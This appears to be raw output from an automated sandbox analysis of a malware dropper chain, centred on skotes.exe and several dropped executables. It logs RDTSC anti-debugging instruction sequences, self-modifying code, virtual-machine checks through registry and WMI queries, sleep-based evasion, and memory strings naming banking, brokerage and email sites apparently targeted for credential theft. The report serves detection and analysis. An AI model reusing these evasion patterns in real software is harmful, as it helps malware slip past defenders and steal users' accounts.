                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7E9062 second address: 7E9078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7E7FE1 second address: 7E7FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F6B312295E6h 0x0000000a jno 00007F6B312295E6h 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7E816D second address: 7E8194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F6B30D7C396h 0x0000000e jmp 00007F6B30D7C3A9h 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7E8194 second address: 7E819E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6B312295E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7E819E second address: 7E81C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6B30D7C396h 0x0000000a jmp 00007F6B30D7C3A9h 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7E81C1 second address: 7E81C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7E831C second address: 7E8331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F6B30D7C3A0h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7E88D3 second address: 7E88ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B312295F4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7EB199 second address: 7EB1BD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jnl 00007F6B30D7C396h 0x00000010 pop edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop ecx 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d jg 00007F6B30D7C396h 0x00000023 pop ecx 0x00000024 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7EB1BD second address: 7EB1E7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6B312295E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jc 00007F6B312295F2h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ebx 0x0000001c rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7EB269 second address: 7EB317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F6B30D7C398h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jmp 00007F6B30D7C3A0h 0x00000028 mov ecx, dword ptr [ebp+122D2E80h] 0x0000002e mov edx, dword ptr [ebp+122D3D26h] 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 mov edx, 61A13000h 0x0000003c pop edx 0x0000003d call 00007F6B30D7C399h 0x00000042 jg 00007F6B30D7C39Eh 0x00000048 push eax 0x00000049 jne 00007F6B30D7C39Eh 0x0000004f mov eax, dword ptr [esp+04h] 0x00000053 jp 00007F6B30D7C3A4h 0x00000059 mov eax, dword ptr [eax] 0x0000005b jns 00007F6B30D7C3A2h 0x00000061 mov dword ptr [esp+04h], eax 0x00000065 push eax 0x00000066 push edx 0x00000067 je 00007F6B30D7C398h 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7EB317 second address: 7EB3BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B312295F3h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e and edx, dword ptr [ebp+122D2FC8h] 0x00000014 push 00000003h 0x00000016 or edx, dword ptr [ebp+122D30C0h] 0x0000001c push 00000000h 0x0000001e jmp 00007F6B312295F0h 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F6B312295E8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f jmp 00007F6B312295ECh 0x00000044 call 00007F6B312295E9h 0x00000049 jmp 00007F6B312295EEh 0x0000004e push eax 0x0000004f jmp 00007F6B312295EBh 0x00000054 mov eax, dword ptr [esp+04h] 0x00000058 push ecx 0x00000059 push esi 0x0000005a push eax 0x0000005b pop eax 0x0000005c pop esi 0x0000005d pop ecx 0x0000005e mov eax, dword ptr [eax] 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jnc 00007F6B312295E6h 0x0000006a rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7EB3BD second address: 7EB3C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7EB3C1 second address: 7EB3C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7EB503 second address: 7EB51B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7EB51B second address: 7EB523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7EB606 second address: 7EB60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80B395 second address: 80B399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80B6B1 second address: 80B6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80B6B7 second address: 80B722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B312295F8h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F6B312295F9h 0x00000010 pop eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007F6B312295FBh 0x0000001a push edi 0x0000001b jmp 00007F6B312295F3h 0x00000020 pop edi 0x00000021 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80BCB0 second address: 80BCB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80BCB5 second address: 80BCBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80BCBB second address: 80BCC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80BF68 second address: 80BF6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80BF6C second address: 80BF72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80C0D9 second address: 80C0E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80C24F second address: 80C267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jnc 00007F6B30D7C396h 0x00000011 jbe 00007F6B30D7C396h 0x00000017 popad 0x00000018 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80C267 second address: 80C276 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6B312295EAh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7E2102 second address: 7E210A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80CA17 second address: 80CA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80CA1D second address: 80CA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6B30D7C396h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F6B30D7C396h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80CA32 second address: 80CA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80CA36 second address: 80CA41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80CA41 second address: 80CA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80CA45 second address: 80CA68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A4h 0x00000007 ja 00007F6B30D7C396h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80CBE8 second address: 80CBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80CBEE second address: 80CBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop ebx 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80CD6A second address: 80CD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 80EE78 second address: 80EE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 813DB6 second address: 813DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 814271 second address: 81428A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F6B30D7C398h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F6B30D7C398h 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 814441 second address: 814449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 81466E second address: 814679 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6B30D7C396h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 819EDC second address: 819F38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F6B312295E6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F6B312295F5h 0x00000014 jmp 00007F6B312295F1h 0x00000019 js 00007F6B312295E6h 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 js 00007F6B31229604h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6B312295F0h 0x0000002f jnp 00007F6B312295E6h 0x00000035 rdtsc
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AA3ED7 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8FC5B2 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ACB784 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8FEEEB instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AAA914 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B2B9CB instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 813ED7 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 66C5B2 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 83B784 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 66EEEB instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 81A914 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 89B9CB instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeSpecial instruction interceptor: First address: 902A3D instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeSpecial instruction interceptor: First address: AA9A53 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeSpecial instruction interceptor: First address: B3B756 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04EF022E rdtsc 0_2_04EF022E
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1045Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 390Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1379Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1400Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4776
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3215
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5768
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1764
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5612Thread sleep time: -56028s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6848Thread sleep count: 1045 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6848Thread sleep time: -2091045s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 828Thread sleep count: 390 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 828Thread sleep time: -11700000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2036Thread sleep count: 1379 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2036Thread sleep time: -2759379s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6364Thread sleep count: 1400 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6364Thread sleep time: -2801400s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3772Thread sleep time: -540000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe TID: 2952Thread sleep time: -210000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe TID: 2768Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep time: -3689348814741908s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5808Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe TID: 6900Thread sleep time: -240000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_009336A9 FindFirstFileExW,8_2_009336A9
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_0093375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_0093375A
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_009336A9 FindFirstFileExW,10_2_009336A9
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_0093375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_0093375A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                          Source: file.exe, 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1409061451.0000000000A81000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000000.1434396421.00000000007F1000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.1997684618.00000000007F1000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, 80f68847d3.exe, 00000023.00000002.2383615819.0000000000A8A000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                          Source: d2cb36d600.exe, 0000000B.00000003.2214264543.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
